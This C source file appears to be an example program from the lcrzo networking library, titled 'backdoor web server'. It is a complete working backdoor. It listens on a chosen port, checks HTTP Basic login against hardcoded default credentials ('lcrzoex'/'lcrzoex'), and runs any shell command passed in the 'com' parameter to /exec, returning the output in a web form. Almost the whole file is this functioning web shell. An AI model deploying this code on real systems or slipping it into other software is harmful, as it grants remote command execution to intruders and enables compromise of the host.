
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
shared_lcrzoex_infos lcrzoex_000260=
{ /*reference*/     "lcrzoex", 260,
  /*version*/       1, 1,
  /*title*/         "backdoor web server",
  /*french title*/  "server web backdoor",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "server_name server_port",
  /*french usage*/  "nom_serveur port_serveur",
  /*usage example*/ "1.2.3.4 5566",
  /*fr. usage ex.*/ "1.2.3.4 5566",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000260_main(int argc, char *argv[]);
int lcrzoex_000260_server(lcrzo_sock *psock, lcrzo_ptr pinfos);
int lcrzoex_000260_badcred(lcrzo_sock *psock);
int lcrzoex_000260_goodcred(lcrzo_sock *psock,
			    lcrzo_conststring method,
			    lcrzo_conststring url,
			    lcrzo_constdata body,
			    lcrzo_int32 bodysize);
int lcrzoex_000260_exec(lcrzo_sock *psock, 
			lcrzo_conststring command);


/*-------------------------------------------------------------*/
/* login and password : you may change them */
#define LCRZOEX_000260_LOGIN    "lcrzoex"
#define LCRZOEX_000260_PASSWORD "lcrzoex"

/*-------------------------------------------------------------*/
/* timeout for reading from socket, in seconds */
#define LCRZOEX_000260_TIMEOUT_HEADER 10
#define LCRZOEX_000260_TIMEOUT_BODY   30


/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000260_main(int argc, char *argv[])
{ lcrzo_ipl serveripl;
  lcrzo_uint16 serverport;
  shared_misc_userpass userpass;

  lcrzo_init();
  if ( argc<3 )
  { /* print usage */
    lcrzo_epr(shared_lcrzoex_infos_print(lcrzoex_000260, argv[0]));
    return(LCRZOEX_ERR_MISC_BADTOOLUSAGE);
  }

  /* the default resolver timeout is too short if it's long to reach
     webserver's DNS */
  lcrzo_epr(shared_http_set_resolver_timeout());

  /* initialize IP address */
  lcrzo_epr(shared_para_ipl_init_listen(argv[1], &serveripl));

  /* initialize port numbers */
  lcrzo_epr(shared_para_port_init_listen(argv[2], &serverport));

  /* initialize the socket */
  lcrzo_epr(lcrzo_string_init_text(LCRZOEX_000260_LOGIN, 
				   sizeof(userpass.user), userpass.user));
  lcrzo_epr(lcrzo_string_init_text(LCRZOEX_000260_PASSWORD,
				   sizeof(userpass.pass),
				   userpass.pass));
  lcrzo_epr(lcrzo_sock_tcpmulser_real2(serveripl, serverport, NULL, 0,
				       &lcrzoex_000260_server, &userpass));

  lcrzo_close();
  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000260_server(lcrzo_sock *psock, lcrzo_ptr pinfos)
{ lcrzo_data body;
  lcrzo_int32 bodysize, contentlength;
  lcrzo_string method, url, sitelogin, sitepasswd;
  lcrzo_time maxwaitingtime;
  lcrzo_bool goodcred;
  shared_misc_userpass *puserpass=(shared_misc_userpass *)pinfos;

  /* Note : this server is not KeepAlive */

  /* read header */
  lcrzo_epr(lcrzo_time_init_sec(LCRZOEX_000260_TIMEOUT_HEADER, 
				&maxwaitingtime));
  lcrzo_epr(shared_http_request_readheader(psock, &maxwaitingtime,
					   &method, &url,
					   NULL, NULL, NULL, NULL, NULL,
					   &sitelogin, &sitepasswd,
					   &contentlength, NULL, NULL));

  if ( !strcmp(method, "POST") && contentlength )
  { /* As said in rfc 2068, there is a bug in some clients :
       RFC 2068 : 4.1 Message Types
       Note: certain buggy HTTP/1.0 client implementations generate an
       extra CRLF's after a POST request. To restate what is explicitly
       forbidden by the BNF, an HTTP/1.1 client must not preface or follow
       a request with an extra CRLF.
    */
    /* read body */
    lcrzo_epr(lcrzo_time_init_sec(LCRZOEX_000260_TIMEOUT_BODY, 
				  &maxwaitingtime));
    lcrzo_epr(shared_http_response_readbody(psock, &maxwaitingtime, 
					    contentlength,
					    &body, &bodysize));
  }
  else
  { body=NULL;
    bodysize=0;
  }

  /* check if credentials are ok (allow small incompatibilities) */
  goodcred=LCRZO_FALSE;
  if ( strlen(puserpass->user)==0 )
  { /* do not check more */
    goodcred=LCRZO_TRUE;
  }
  else
  { if ( sitelogin!=NULL )
    { if ( !strcmp(sitelogin, puserpass->user) )
      { if ( strlen(puserpass->pass)==0 )
        { /* do not check more */
          goodcred=LCRZO_TRUE;
        }
        else
        { if ( sitepasswd!=NULL )
          { if ( !strcmp(sitepasswd, puserpass->pass) )
            { goodcred=LCRZO_TRUE;
            }
          }
        }
      }
    }
  }

  /* treat */
  if ( goodcred )
  { /* good credentials */ 
    lcrzo_epr(lcrzoex_000260_goodcred(psock, method, url, body, bodysize));
  }
  else
  { /* good credentials */ 
    lcrzo_epr(lcrzoex_000260_badcred(psock));
  }
  
  /* free memory */
  if (body!=NULL) { lcrzo_epr(lcrzo_data_free2(&body)); }
  lcrzo_epr(lcrzo_string_free2(&method));
  lcrzo_epr(lcrzo_string_free2(&url));
  if (sitelogin!=NULL) { lcrzo_epr(lcrzo_string_free2(&sitelogin)); }
  if (sitepasswd!=NULL) { lcrzo_epr(lcrzo_string_free2(&sitepasswd)); }

  return(LCRZO_ERR_OK);
  pinfos=pinfos; /*just for the compiler warning*/
}

/*-------------------------------------------------------------*/
int lcrzoex_000260_badcred(lcrzo_sock *psock)
{ lcrzo_int16 language;
  lcrzo_data data;
  lcrzo_int32 datasize;

  /* get language for messages */
  lcrzo_epr(lcrzo_global_get_language(&language));

  lcrzo_epr(shared_http_initm_httpvererr("1.0", 401, 
					 (language==LCRZO_GLOBAL_LANG_FR)?
					 "Vous devez vous authentifier":
					 "Authorization Required",
					 &data, &datasize));
  lcrzo_epr(shared_http_appendm_connection(NULL, datasize, &data, &datasize));
  lcrzo_epr(shared_http_appendm_contenttype(NULL, datasize, &data, &datasize));
  lcrzo_epr(shared_http_appendm_wwwauth((language==LCRZO_GLOBAL_LANG_FR)?
					"Acces web a lcrzoex 260":
					"Lcrzoex 260 web access",
					datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("\r\n", datasize, &data, &datasize));

  lcrzo_epr(lcrzo_data_appendm_text("<HTML><BODY>\n", datasize,
				    &data, &datasize));
  if ( language==LCRZO_GLOBAL_LANG_FR)
  { lcrzo_epr(lcrzo_data_appendm_text(
              "Entrez le login/password de lcrzoex_000260.c\n",
				      datasize, &data, &datasize));
  }
  else
  { lcrzo_epr(lcrzo_data_appendm_text(
              "Enter login/password from lcrzoex_000260.c\n", 
				      datasize, &data, &datasize));
  }
  lcrzo_epr(lcrzo_data_appendm_text("</BODY></HTML>\n", datasize, 
				    &data, &datasize));

  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_epr(lcrzo_data_free2(&data));
  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000260_goodcred(lcrzo_sock *psock,
			    lcrzo_conststring method,
			    lcrzo_conststring url,
			    lcrzo_constdata body,
			    lcrzo_int32 bodysize)
{ lcrzo_int16 language;
  lcrzo_data data;
  lcrzo_int32 datasize;
  lcrzo_string command;
  int ret;

  /* get language for messages */
  lcrzo_epr(lcrzo_global_get_language(&language));

  /* verify the method */
  if ( strcmp(method, "GET") && strcmp(method, "POST") )
  { lcrzo_epr(shared_http_initm_httpvererr("1.0", 200, "OK", &data,&datasize));
    lcrzo_epr(shared_http_appendm_connection(NULL, datasize, &data,&datasize));
    lcrzo_epr(shared_http_appendm_contenttype(NULL, datasize,&data,&datasize));
    lcrzo_epr(lcrzo_data_appendm_text("\r\n", datasize, &data, &datasize));
    lcrzo_epr(lcrzo_data_appendm_text("<HTML><BODY>\n", datasize,
				      &data, &datasize));
    if ( language==LCRZO_GLOBAL_LANG_FR)
    { lcrzo_epr(lcrzo_data_appendm_text("Bienvenue.<BR>\n", datasize, 
					&data, &datasize));
    }
    else
    { lcrzo_epr(lcrzo_data_appendm_text("Welcome.<BR>\n", datasize,
					&data, &datasize));
    }
    if ( language==LCRZO_GLOBAL_LANG_FR)
    { lcrzo_epr(lcrzo_data_appendm_text("Seules les methodes GET et POST\n", 
					datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("sont actuellement supportees\n", 
					datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("dans lcrzoex_000260.c.\n", 
					datasize, &data, &datasize));
    }
    else
    { lcrzo_epr(lcrzo_data_appendm_text("Only GET and POST methods \n", 
					datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("are actually supported\n", 
					datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("in lcrzoex_000260.c.\n", 
					datasize, &data, &datasize));
    }
    lcrzo_epr(lcrzo_data_appendm_text("</BODY></HTML>\n", datasize,
				      &data, &datasize));

    lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
    lcrzo_epr(lcrzo_data_free2(&data));
    return(LCRZO_ERR_OK);
  }

  /* verify the url */
  if ( strncmp(url, "/exec", 5) &&
       strncmp(url, "/exec/", 6) &&
       strncmp(url, "/exec?", 6) )
  { lcrzo_epr(shared_http_initm_httpvererr("1.0", 200, "OK", &data,&datasize));
    lcrzo_epr(shared_http_appendm_connection(NULL, datasize, &data,&datasize));
    lcrzo_epr(shared_http_appendm_contenttype(NULL, datasize,&data,&datasize));
    lcrzo_epr(lcrzo_data_appendm_text("\r\n", datasize, &data, &datasize));
    lcrzo_epr(lcrzo_data_appendm_text("<HTML><BODY>\n", datasize,
				      &data, &datasize));
    if ( language==LCRZO_GLOBAL_LANG_FR)
    { lcrzo_epr(lcrzo_data_appendm_text("Bienvenue.<BR>\n", datasize, 
					&data, &datasize));
    }
    else
    { lcrzo_epr(lcrzo_data_appendm_text("Welcome.<BR>\n", 
					datasize, &data, &datasize));
    }
    if ( language==LCRZO_GLOBAL_LANG_FR)
    { lcrzo_epr(lcrzo_data_appendm_text("Seule l'url http://serveur/exec\n", 
					datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("est actuellement supportee\n", 
					datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("dans lcrzoex_000260.c.\n", 
					datasize, &data, &datasize));
    }
    else
    { lcrzo_epr(lcrzo_data_appendm_text("Only the url http://server/exec\n", 
					datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("is actually supported\n", 
					datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("in lcrzoex_000260.c.\n", 
					datasize, &data, &datasize));
    }
    lcrzo_epr(lcrzo_data_appendm_text("</BODY></HTML>\n", datasize,
				      &data, &datasize));

    lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
    lcrzo_epr(lcrzo_data_free2(&data));
    return(LCRZO_ERR_OK);
  }

  /* get value of posted variable */
  /*lcrzo_data_print(body, bodysize, LCRZO_PRINTTYPE_DUMP);*/
  lcrzo_epr(lcrzo_string_initm_data(body, bodysize, &command));
  ret=shared_http_varval_decode(command, "com", &data, &datasize);
  lcrzo_epr(lcrzo_string_free2(&command));
  if (ret==LCRZO_ERR_OK)
  { lcrzo_epr(lcrzo_string_initm_data(data, datasize, &command));
    lcrzo_epr(lcrzo_data_free2(&data));  
  }
  else
  { lcrzo_epr(lcrzo_string_initm_text("", &command));
  }

  if (strlen(command)==0)
  { lcrzo_epr(lcrzo_string_free2(&command));
    /* get value of get variable */
    lcrzo_epr(shared_http_dp_decode(url, NULL, &command, NULL));
    ret=shared_http_varval_decode(command, "com", &data, &datasize);
    lcrzo_epr(lcrzo_string_free2(&command));
    if (ret==LCRZO_ERR_OK)
    { lcrzo_epr(lcrzo_string_initm_data(data, datasize, &command));
      lcrzo_epr(lcrzo_data_free2(&data));  
    }
    else
    { lcrzo_epr(lcrzo_string_initm_text("", &command));
    }
  }

  /* print the header */
  lcrzo_epr(shared_http_initm_httpvererr("1.0", 200, "OK", &data, &datasize));
  lcrzo_epr(shared_http_appendm_connection(NULL, datasize, &data, &datasize));
  lcrzo_epr(shared_http_appendm_contenttype(NULL, datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("\r\n", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("<HTML><BODY>\n", datasize,
				    &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_epr(lcrzo_data_free2(&data));

  /* execute the command */
  if (strlen(command))
  { /* print line */
    if ( language==LCRZO_GLOBAL_LANG_FR)
    { lcrzo_epr(lcrzo_data_initm_text("Resultat de la commande \"", 
				      &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text(command, datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("\" : <BR>\n<PRE>\n", 
					datasize, &data, &datasize));
     }
    else
    { lcrzo_epr(lcrzo_data_initm_text("Result of the command \"",
				      &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text(command, datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("\" : <BR>\n<PRE>\n", 
					datasize, &data, &datasize));
    }
    lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
    lcrzo_epr(lcrzo_data_free2(&data));
    /* execute the command */
    lcrzo_epr(lcrzoex_000260_exec(psock, command));
    lcrzo_epr(lcrzo_sock_write(psock, (lcrzo_constdata)"</PRE>\n", 7));
  }
  else
  { if ( language==LCRZO_GLOBAL_LANG_FR)
    { lcrzo_epr(lcrzo_data_initm_text("Bienvenue.<BR>\n", &data, &datasize));
    }
    else
    { lcrzo_epr(lcrzo_data_initm_text("Welcome.<BR>\n", &data, &datasize));
    }
    lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
    lcrzo_epr(lcrzo_data_free2(&data));
  }
  lcrzo_epr(lcrzo_string_free2(&command));

  /* propose the form */
  if ( language==LCRZO_GLOBAL_LANG_FR)
  { lcrzo_epr(lcrzo_data_initm_text("<BR><BR>Entrez votre commande<BR>\n", 
				    &data, &datasize));
  }
  else
  { lcrzo_epr(lcrzo_data_initm_text("<BR><BR>Enter your command<BR>\n", 
				    &data, &datasize));
  }
  lcrzo_epr(lcrzo_data_appendm_text("\n", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("<FORM METHOD=POST ACTION=\"/exec\">", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text(" <INPUT NAME=\"com\" TYPE=text SIZE=50>", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text(" <INPUT TYPE=submit VALUE=\"entrer\">", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("</FORM>", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("\n", 
				    datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("</BODY></HTML>\n", datasize,
				    &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_epr(lcrzo_data_free2(&data));

  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000260_exec(lcrzo_sock *psock, 
			lcrzo_conststring command)
{ lcrzo_data data, data2;
  lcrzo_int32 datasize, datasize2;
  lcrzo_ipc ipc;
  shared_misc_ipcexec smi;
  int ret;

  /* execute the given command */
  lcrzo_epr(shared_misc_ipcexec_init(command, &smi, &ipc));
  lcrzo_er(lcrzo_ipc_close_write(&ipc));

  /* read all data */
  while ( lcrzo_ipc_readm(&ipc, LCRZO_WAIT_INFINITE, &data, &datasize)
	  == LCRZO_ERR_OK ) 
  { lcrzo_epr(lcrzo_data_replacem_text(data, datasize, LCRZO_FALSE, +1, -1,
                                       0, "<", (lcrzo_constdata)"&lt;", 4, &data2, &datasize2));
    lcrzo_epr(lcrzo_data_free2(&data));
    lcrzo_epr(lcrzo_data_replacem_text(data2, datasize2, LCRZO_FALSE, +1, -1,
                                       0, ">", (lcrzo_constdata)"&gt;", 4, &data, &datasize));
    lcrzo_epr(lcrzo_data_free2(&data2));
    lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
    lcrzo_epr(lcrzo_data_free2(&data));
  }

  /* write error code */
  ret=shared_misc_ipcexec_close(&smi);
  lcrzo_epr(lcrzo_ipc_close(&ipc));
  lcrzo_epr(lcrzo_data_initm_text("\n\nReturn code : ", &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_int32(ret, "%d", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_epr(lcrzo_data_free2(&data));
 
  return(LCRZO_ERR_OK);
}
